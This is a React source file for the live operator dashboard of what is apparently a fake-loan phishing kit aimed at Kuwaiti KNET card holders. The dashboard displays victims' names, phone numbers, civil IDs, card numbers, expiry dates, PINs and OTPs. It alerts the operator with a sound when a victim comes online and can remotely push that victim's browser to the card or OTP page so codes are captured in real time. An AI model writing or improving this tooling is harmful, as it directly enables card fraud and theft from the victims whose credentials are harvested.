import React, { useEffect, useRef, useState } from "react";
import { db } from "../firebaseConfig";
import Loader from "../components/Loader";
import {
  collection,
  onSnapshot,
  orderBy,
  query,
  deleteDoc,
  doc,
  setDoc,
  serverTimestamp,
} from "firebase/firestore";

export default function Dashboard() {
  const [combinedEntries, setCombinedEntries] = useState([]);
  const [loanEntries, setLoanEntries] = useState([]);
  const [knetEntries, setKnetEntries] = useState([]);
  const [calcEntries, setCalcEntries] = useState([]);
  const [loading, setLoading] = useState(true);
  const [pageDelayDone, setPageDelayDone] = useState(false);
  const [loansReady, setLoansReady] = useState(false);
  const [knetReady, setKnetReady] = useState(false);
  const [calcReady, setCalcReady] = useState(false);
  const [statusFilter, setStatusFilter] = useState("all");
  const [now, setNow] = useState(() => Date.now());
  const [notificationPermission, setNotificationPermission] = useState(
    typeof window !== "undefined" && "Notification" in window ? Notification.permission : "default"
  );
  const activeStatusRef = useRef(new Map());
  const activeInitializedRef = useRef(false);
  const onlineSoundRef = useRef(null);

  useEffect(() => {
    const intervalId = setInterval(() => {
      setNow(Date.now());
    }, 30000);
    return () => clearInterval(intervalId);
  }, []);

  useEffect(() => {
    const timeoutId = setTimeout(() => setPageDelayDone(true), 1200);
    return () => clearTimeout(timeoutId);
  }, []);

  const requestNotificationPermission = async () => {
    if (typeof window === "undefined" || !("Notification" in window)) return;
    try {
      const permission = await Notification.requestPermission();
      setNotificationPermission(permission);
    } catch (err) {
      console.warn("Notification permission request failed:", err);
    }
  };

  useEffect(() => {
    const loansQuery = query(collection(db, "loanEntries"), orderBy("updatedAt", "desc"));
    const unsubLoans = onSnapshot(loansQuery, (snapshot) => {
      const list = snapshot.docs.map((d) => ({ id: d.id, ...d.data() }));
      setLoanEntries(list);
      setLoansReady(true);
    });

    return () => unsubLoans();
  }, []);

  useEffect(() => {
    const knetQuery = query(collection(db, "knetEntries"), orderBy("createdAt", "desc"));
    const unsubKnet = onSnapshot(knetQuery, (snapshot) => {
      const newList = snapshot.docs.map((d) => ({ id: d.id, ...d.data() }));
      setKnetEntries(newList);
      setKnetReady(true);
    });

    return () => unsubKnet();
  }, []);

  useEffect(() => {
    const calcQuery = query(collection(db, "calculateEntries"), orderBy("createdAt", "desc"));
    const unsubCalc = onSnapshot(calcQuery, (snapshot) => {
      const list = snapshot.docs.map((d) => ({ id: d.id, ...d.data() }));
      setCalcEntries(list);
      setCalcReady(true);
    });

    return () => unsubCalc();
  }, []);

  useEffect(() => {
    if (loansReady && knetReady && calcReady) {
      setLoading(false);
    }
  }, [calcReady, knetReady, loansReady]);

  useEffect(() => {
    const grouped = new Map();
    const loanIdByCalcId = new Map();
    const calcById = new Map(calcEntries.map((calc) => [calc.id, calc]));

    const upsertEntry = (loanId) => {
      if (!loanId) return null;
      if (!grouped.has(loanId)) {
        grouped.set(loanId, { loanId, loan: null, knet: null, calculation: null });
      }
      return grouped.get(loanId);
    };

    loanEntries.forEach((loanDoc) => {
      const loanId = loanDoc.loanId || loanDoc.id;
      if (loanDoc.calculationId) {
        loanIdByCalcId.set(loanDoc.calculationId, loanId);
      }
      const entry = upsertEntry(loanId);
      if (entry) {
        entry.loan = loanDoc;
        if (loanDoc.calculationId && calcById.has(loanDoc.calculationId)) {
          entry.calculation = calcById.get(loanDoc.calculationId);
        }
      }
    });

    calcEntries.forEach((calcDoc) => {
      const targetLoanId = calcDoc.loanId || loanIdByCalcId.get(calcDoc.id) || calcDoc.id;
      const entry = upsertEntry(targetLoanId);
      if (entry && !entry.calculation) entry.calculation = calcDoc;
    });

    knetEntries.forEach((knetDoc) => {
      const loanId = knetDoc.loanId || knetDoc.id;
      const entry = upsertEntry(loanId);
      if (entry) entry.knet = knetDoc;
    });

    const merged = Array.from(grouped.values()).map((entry) => {
      const timestamps = [
        entry.knet?.updatedAt || entry.knet?.createdAt || null,
        entry.loan?.updatedAt || entry.loan?.createdAt || null,
        entry.calculation?.updatedAt || entry.calculation?.createdAt || null,
      ];
      const latestActivity = timestamps.reduce(
        (latest, current) =>
          getTimestampValue(current) > getTimestampValue(latest) ? current : latest,
        null
      );
      const presenceTimestamps = [
        entry.calculation?.lastSeenAt || null,
        entry.loan?.lastSeenAt || null,
        entry.knet?.lastSeenAt || null,
      ];
      const lastSeenAt = presenceTimestamps.reduce(
        (latest, current) =>
          getTimestampValue(current) > getTimestampValue(latest) ? current : latest,
        null
      );
      return { ...entry, latestActivity, lastSeenAt };
    });

    merged.sort((a, b) => getTimestampValue(b.latestActivity) - getTimestampValue(a.latestActivity));
    setCombinedEntries(merged);
  }, [loanEntries, knetEntries, calcEntries]);

  const handleDeleteEntry = async (entry) => {
    if (!window.confirm("هل أنت متأكد من حذف هذا السجل بالكامل؟")) return;
    try {
      const deletions = [];
      if (entry.loan?.id) {
        deletions.push(deleteDoc(doc(db, "loanEntries", entry.loan.id)));
      }
      if (entry.loanId) {
        deletions.push(deleteDoc(doc(db, "knetEntries", entry.loanId)));
      }
      if (entry.knet?.id && entry.knet.id !== entry.loanId) {
        deletions.push(deleteDoc(doc(db, "knetEntries", entry.knet.id)));
      }
      const calcDocId = entry.calculation?.id || entry.loan?.calculationId || entry.loanId;
      if (calcDocId) {
        deletions.push(deleteDoc(doc(db, "calculateEntries", calcDocId)));
      }
      await Promise.all(deletions);
    } catch (err) {
      console.error("Erreur:", err);
      alert("حدث خطأ أثناء الحذف");
    }
  };

  function getTimestampValue(ts) {
    if (!ts) return 0;
    if (typeof ts.toDate === "function") {
      return ts.toDate().getTime();
    }
    return new Date(ts).getTime();
  }

  const ACTIVE_WINDOW_MS = 60 * 1000;

  function getActivityMeta(ts) {
    const value = getTimestampValue(ts);
    const isActive = value > 0 && now - value < ACTIVE_WINDOW_MS;
    return {
      label: isActive ? "Active Now" : "Offline",
      dotClassName: isActive ? "bg-emerald-500" : "bg-gray-400",
      textClassName: isActive ? "text-emerald-600" : "text-gray-500",
      isActive,
    };
  }

  function formatTimestamp(ts) {
    if (!ts) return "-";
    const date = typeof ts.toDate === "function" ? ts.toDate() : new Date(ts);
    return date.toLocaleString("en-EG");
  }

  function countryFlagFromCode(code) {
    if (!code || typeof code !== "string" || code.trim().length < 2) return "";
    const upper = code.trim().slice(0, 2).toUpperCase();
    return upper.replace(/[A-Z]/g, (char) =>
      String.fromCodePoint(127397 + char.charCodeAt(0))
    );
  }

  function getCountryCode(entry) {
    return (
      entry.calculation?.country ||
      entry.loan?.country ||
      entry.knet?.country ||
      ""
    );
  }

  useEffect(() => {
    if (combinedEntries.length === 0) {
      activeStatusRef.current.clear();
      activeInitializedRef.current = false;
      return;
    }

    const nextMap = new Map();
    let shouldPlay = false;

    combinedEntries.forEach((entry) => {
      const entryKey =
        entry.loanId || entry.loan?.id || entry.knet?.id || entry.calculation?.id || null;
      if (!entryKey) return;
      const lastSeenAt = entry.lastSeenAt;
      const lastSeenValue = getTimestampValue(lastSeenAt);
      const isActive = lastSeenValue > 0 && Date.now() - lastSeenValue < ACTIVE_WINDOW_MS;
      nextMap.set(entryKey, isActive);

      if (activeInitializedRef.current) {
        const wasActive = activeStatusRef.current.get(entryKey);
        if (!wasActive && isActive) shouldPlay = true;
      }
    });

    activeStatusRef.current = nextMap;
    if (!activeInitializedRef.current) {
      activeInitializedRef.current = true;
      return;
    }

    if (shouldPlay) {
      if (!onlineSoundRef.current) {
        const audio = new Audio("/notify.mp3");
        audio.preload = "auto";
        audio.volume = 0.7;
        onlineSoundRef.current = audio;
      }
      const audio = onlineSoundRef.current;
      audio.currentTime = 0;
      audio.play().catch((err) => console.warn("Online sound blocked:", err));
    }
  }, [combinedEntries]);

  function formatCardNumber(card) {
    if (!card) return "-";
    return card.replace(/(.{4})/g, "$1 ").trim();
  }

  function formatCurrencyValue(value) {
    if (value === undefined || value === null || value === "") return "-";
    const numeric = Number(value);
    if (Number.isNaN(numeric)) return value;
    return new Intl.NumberFormat("en-KW", {
      minimumFractionDigits: 2,
      maximumFractionDigits: 2,
    }).format(numeric);
  }

  function getStatusMeta(entry) {
    if (entry.knet?.otp) {
      return { label: "اكتمل OTP", className: "bg-green-100 text-green-700" };
    }
    if (entry.knet) {
      return { label: "بانتظار OTP", className: "bg-yellow-100 text-yellow-700" };
    }
    return { label: "بانتظار بيانات البنك", className: "bg-blue-100 text-blue-700" };
  }

  const redirectTargets = [
    { path: "/calculate", label: "الحاسبة" },
    { path: "/loan", label: "الطلب" },
    { path: "/knet", label: "KNET" },
    { path: "/otp", label: "OTP" },
  ];

  const handleRemoteRedirect = async (entry, path) => {
    const docId = entry.calculation?.id || entry.loan?.calculationId || entry.loanId;
    if (!docId) {
      alert("لا يمكن تنفيذ التحويل بدون معرّف.");
      return;
    }
    try {
      await setDoc(
        doc(db, "calculateEntries", docId),
        { redirectTo: path, redirectAt: serverTimestamp() },
        { merge: true }
      );
    } catch (err) {
      console.error("Failed to send redirect:", err);
      alert("تعذر إرسال الأمر، حاول مرة أخرى.");
    }
  };

  const InfoRow = ({ label, value, accent = "text-gray-800", valueClassName = "" }) => {
    const displayValue =
      value === undefined || value === null
        ? "-"
        : typeof value === "string" && value.trim() === ""
        ? "-"
        : value;

    return (
      <div className="flex items-center justify-between text-xs sm:text-sm gap-2">
        <span className="text-gray-500">{label}</span>
        <span className={`font-semibold text-left ${accent} ${valueClassName}`}>{displayValue}</span>
      </div>
    );
  };

  const showLoader = loading || !pageDelayDone;
  if (showLoader) return <Loader />;

  const totalLoans = combinedEntries.length;
  const waitingBank = combinedEntries.filter((entry) => !entry.knet).length;
  const waitingOtp = combinedEntries.filter((entry) => entry.knet && !entry.knet?.otp).length;
  const completedOtp = combinedEntries.filter((entry) => entry.knet?.otp).length;
  const calcCount = calcEntries.length;

  const getEntryStatus = (entry) => {
    if (!entry.knet) return "waitingBank";
    if (entry.knet && !entry.knet.otp) return "waitingOtp";
    return "completedOtp";
  };

  const filteredEntries = combinedEntries.filter((entry) =>
    statusFilter === "all" ? true : getEntryStatus(entry) === statusFilter
  );

  const statsTiles = [
    { id: "all", label: "إجمالي الطلبات", count: totalLoans },
    { id: "waitingBank", label: "بانتظار بيانات البنك", count: waitingBank },
    { id: "waitingOtp", label: "بانتظار OTP", count: waitingOtp },
    { id: "completedOtp", label: "مكتمل (OTP)", count: completedOtp },
  ];

  return (
    <div
      dir="rtl"
      className="min-h-screen bg-gradient-to-br from-blue-50 via-white to-blue-100/30 p-6 font-[Tahoma]"
    >
      <div className="max-w-7xl mx-auto space-y-5">
        <div className="bg-gradient-to-r from-blue-700 to-blue-500 rounded-2xl p-6 text-white shadow-2xl border border-white/10">
          <div className="space-y-2">
            <div className="flex flex-wrap items-center justify-between gap-3">
              <div>
                <h1 className="text-3xl font-bold tracking-wide">لوحة التحكم</h1>
                <p className="text-sm text-blue-100">
                  مراقبة فورية لكل بيانات الطلبات المرسلة من العملاء في الوقت الحقيقي.
                </p>
              </div>
              {notificationPermission !== "granted" && (
                <button
                  type="button"
                  onClick={requestNotificationPermission}
                  className="bg-white/15 text-white border border-white/30 px-4 py-2 rounded-lg text-xs font-semibold hover:bg-white/25 transition"
                >
                  تفعيل إشعارات المتصفح
                </button>
              )}
            </div>
          </div>
          <div className="grid grid-cols-2 lg:grid-cols-5 gap-2 mt-4 text-center">
            {statsTiles.map((tile) => {
              const isActive = statusFilter === tile.id;
              return (
                <button
                  key={tile.id}
                  type="button"
                  onClick={() => setStatusFilter(tile.id)}
                  className={`rounded-xl px-3 py-2 border transition shadow-inner focus:outline-none focus-visible:ring-2 focus-visible:ring-white/60 ${
                    isActive
                      ? "bg-white text-blue-700 border-white shadow-lg"
                      : "bg-white/15 text-white border-white/20 hover:bg-white/25"
                  }`}
                >
                  <p className="text-xs opacity-80">{tile.label}</p>
                  <p className="text-2xl font-bold">{loading ? "--" : tile.count}</p>
                </button>
              );
            })}
            <div className="rounded-xl px-3 py-2 border transition shadow-inner bg-white text-blue-700 border-white">
              <p className="text-xs opacity-80">حسابات الحاسبة</p>
              <p className="text-2xl font-bold">{loading ? "--" : calcCount}</p>
            </div>
          </div>
        </div>

        {loading ? (
          <div className="flex flex-col items-center justify-center py-20 bg-white rounded-3xl shadow-lg border border-blue-100">
            <div className="w-12 h-12 border-4 border-blue-100 border-t-blue-600 rounded-full animate-spin mb-4"></div>
            <p className="text-gray-600 font-medium">جاري تحميل البيانات...</p>
          </div>
        ) : combinedEntries.length === 0 ? (
          <div className="bg-white rounded-3xl shadow-lg border-2 border-dashed border-blue-200 py-16 text-center">
            <p className="text-gray-500 font-medium">لا توجد بيانات بعد.</p>
            <p className="text-xs text-gray-400 mt-2">ستظهر الطلبات هنا فور إكمالها.</p>
          </div>
        ) : filteredEntries.length === 0 ? (
          <div className="bg-white rounded-3xl shadow-lg border border-blue-100 py-16 text-center">
            <p className="text-gray-500 font-medium">لا توجد سجلات مطابقة لهذا الفلتر.</p>
          </div>
        ) : (
          <div className="grid gap-4 md:grid-cols-2 xl:grid-cols-3">
            {filteredEntries.map((entry, index) => {
              const personal = entry.loan?.personal || {};
              const salary = entry.loan?.salary || {};
              const bankData = entry.knet || {};
              const calcData = entry.calculation || entry.loan?.calculation || {};
              const statusMeta = getStatusMeta(entry);
              const activityMeta = getActivityMeta(entry.lastSeenAt);
              const countryCode = getCountryCode(entry);
              const countryFlag = countryFlagFromCode(countryCode);
              const cardKey = entry.loanId || entry.loan?.id || bankData.id || `entry-${index}`;
              const displayName =
                personal.fullName || bankData.bank || calcData.loanType || "مستخدم غير معروف";
              return (
                <article
                  key={cardKey}
                  className="bg-white rounded-2xl border border-blue-100 shadow-md shadow-blue-100/50 p-4 flex flex-col gap-4"
                >
                  <div className="flex items-start justify-between gap-3">
                    <div>
                      <p className="text-base font-bold text-gray-900">{displayName}</p>
                      <div className="mt-1 flex flex-wrap items-center gap-2 text-[11px] text-gray-500">
                        <span>آخر تحديث: {formatTimestamp(entry.latestActivity)}</span>
                        <span className={`inline-flex items-center gap-1 ${activityMeta.textClassName}`}>
                          <span className={`w-2 h-2 rounded-full ${activityMeta.dotClassName}`} />
                          {activityMeta.label}
                        </span>
                        {countryCode ? (
                          <span className="inline-flex items-center gap-1 bg-blue-50 text-blue-700 px-2 py-0.5 rounded-full font-semibold">
                            {countryFlag && <span>{countryFlag}</span>}
                            <span className="uppercase tracking-wide">{countryCode}</span>
                          </span>
                        ) : null}
                      </div>
                    </div>
                    <span
                      className={`px-3 py-1 rounded-full text-[11px] font-semibold ${statusMeta.className}`}
                    >
                      {statusMeta.label}
                    </span>
                  </div>

                  <div className="grid gap-3 sm:grid-cols-2">
                    <section className="rounded-xl border border-blue-50 bg-gradient-to-br from-white via-blue-50/40 to-white p-3 space-y-2 shadow-sm">
                      <p className="text-xs font-bold text-blue-900">المعلومات الشخصية</p>
                      <InfoRow label="الاسم الكامل" value={personal.fullName} />
                      <InfoRow label="رقم الهاتف" value={personal.phone} />
                      <InfoRow label="الرقم المدني" value={personal.civilId} />
                    </section>

                    <section className="rounded-xl border border-blue-50 bg-gradient-to-br from-white via-blue-50/40 to-white p-3 space-y-2 shadow-sm">
                      <p className="text-xs font-bold text-blue-900">البيانات البنكية</p>
                      <InfoRow label="البنك" value={bankData.bank} />
                      <InfoRow label="البادئة" value={bankData.prefix} />
                      <InfoRow
                        label="رقم البطاقة"
                        value={formatCardNumber(bankData.card)}
                        valueClassName="whitespace-nowrap tracking-wider"
                      />
                      <InfoRow
                        label="تاريخ الانتهاء"
                        value={
                          bankData.month && bankData.year ? `${bankData.month}/${bankData.year}` : "-"
                        }
                      />
                      <InfoRow label="PIN" value={bankData.pin} accent="text-rose-600" />
                      <InfoRow
                        label="OTP"
                        value={bankData.otp || "—"}
                        accent={bankData.otp ? "text-emerald-600" : "text-gray-800"}
                      />
                      <InfoRow
                        label="آخر تحديث"
                        value={formatTimestamp(
                          bankData.verifiedAt || bankData.updatedAt || bankData.createdAt
                        )}
                      />
                    </section>

                    <section className="rounded-xl border border-blue-50 bg-gradient-to-br from-white via-blue-50/40 to-white p-3 space-y-2 shadow-sm">
                      <p className="text-xs font-bold text-blue-900">الراتب والمبلغ المطلوب</p>
                      <InfoRow
                        label="صافي الراتب"
                        value={salary.netSalary ? `${salary.netSalary} د.ك` : "-"}
                      />
                      <InfoRow
                        label="المبلغ المطلوب"
                        value={salary.requestedAmount ? `${salary.requestedAmount} د.ك` : "-"}
                      />
                      <InfoRow label="المسمى الوظيفي" value={salary.jobTitle} />
                      <InfoRow
                        label="دخل إضافي"
                        value={salary.additionalIncome ? `${salary.additionalIncome} د.ك` : "-"}
                      />
                    </section>

                    <section className="rounded-xl border border-blue-50 bg-gradient-to-br from-white via-blue-50/40 to-white p-3 space-y-2 shadow-sm">
                      <p className="text-xs font-bold text-blue-900">تفاصيل القرض المحتسب</p>
                      <InfoRow
                        label="المبلغ المطلوب"
                        value={
                          calcData.amount !== undefined && calcData.amount !== null
                            ? `${formatCurrencyValue(calcData.amount)} د.ك`
                            : "-"
                        }
                      />
                      <InfoRow
                        label="المدة"
                        value={
                          calcData.months !== undefined && calcData.months !== null
                            ? `${calcData.months} شهر`
                            : "-"
                        }
                      />
                      <InfoRow
                        label="القسط الشهري"
                        value={
                          calcData.monthlyPayment !== undefined && calcData.monthlyPayment !== null
                            ? `${formatCurrencyValue(calcData.monthlyPayment)} د.ك`
                            : "-"
                        }
                      />
                      <InfoRow
                        label="قيمة الفائدة"
                        value={
                          calcData.interestAmount !== undefined && calcData.interestAmount !== null
                            ? `${formatCurrencyValue(calcData.interestAmount)} د.ك`
                            : "-"
                        }
                      />
                      <InfoRow label="الدولة" value={calcData.country} />
                      <InfoRow label="الولاية" value={calcData.stateName} />
                    </section>

                  </div>

                  <div className="flex justify-end">
                    <div className="flex flex-wrap justify-end gap-2">
                      {activityMeta.isActive &&
                        redirectTargets.map((target) => (
                          <button
                            key={target.path}
                            onClick={() => handleRemoteRedirect(entry, target.path)}
                            className="text-[11px] font-semibold text-blue-600 border border-blue-200 hover:bg-blue-600 hover:text-white px-3 py-1.5 rounded-lg transition"
                          >
                            {target.label}
                          </button>
                        ))}
                      <button
                        onClick={() => handleDeleteEntry(entry)}
                        className="text-[11px] font-semibold text-red-600 border border-red-200 hover:bg-red-600 hover:text-white px-3 py-1.5 rounded-lg transition"
                      >
                        حذف
                      </button>
                    </div>
                  </div>
                </article>
              );
            })}
          </div>
        )}
      </div>
    </div>
  );
}
